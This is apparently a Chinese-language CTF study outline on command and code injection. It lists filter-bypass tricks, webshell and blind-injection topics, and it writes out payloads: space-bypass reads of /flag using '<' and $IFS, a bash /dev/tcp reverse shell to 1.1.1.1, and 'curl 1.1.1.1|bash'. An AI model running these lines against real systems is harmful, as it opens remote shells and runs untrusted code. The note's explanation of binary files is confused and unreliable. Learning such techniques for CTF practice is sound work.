大佬：

命令执行:
1.各种bypass骚姿势
2.无回显怎么办
2.1 dnslog和反弹shell
2.2 写webshell
2.3 命令执行时间盲注


代码执行:

1. eval和assert差别及版本不同对使用的影响
   2.无字母数字webshell 不同版本又有哪些特性

bypass disable_function一些姿势

Linux cut命令

Linux cut命令用于显示每行从开头算起 num1 到 num2 的文字。

cut命令

whereis命令

whereis命令用来定位指令的二进制程序、源代码文件和man手册页等相关文件的路径。

只能找二进制文件!啥意思呢？二进制文件就是编译后的程序文件！

如：helloword.c 编译后 helloword.exe

helloword.exe就是二进制文件！

helloword.exe手动点击就安装了！但是在linux下要用yum安装！

https://coomrade.github.io/2018/09/12/time-base-order-injection/

https://xzfile.aliyuncs.com/media/upload/picture/20190120174912-a3cd3eba-1c98-1.png)

bypass@@重点

前面都是些基础的命令！后面的bypass是重点！

空格绕过

使用<或者<>

$ cat</flag
flag{xxx}

$ cat<>/flag
flag{xxx}

使用IFS或者

Copy$ cat$IFS$9/flag
flag{xxx}

$ cat${IFS}/flag
flag{xxx}

$ cat$IFS/flag
flag{xxx}

大概Bypass一些命令注入限制的姿势里面都要!!!

反弹shell:

服务器下放个：

bash -c “bash -i >&/dev/tcp/1.1.1.1/5555 0>&1”

直接 curl 1.1.1.1|bash

巧用命令注入的N种方式

命令注入中的时间盲注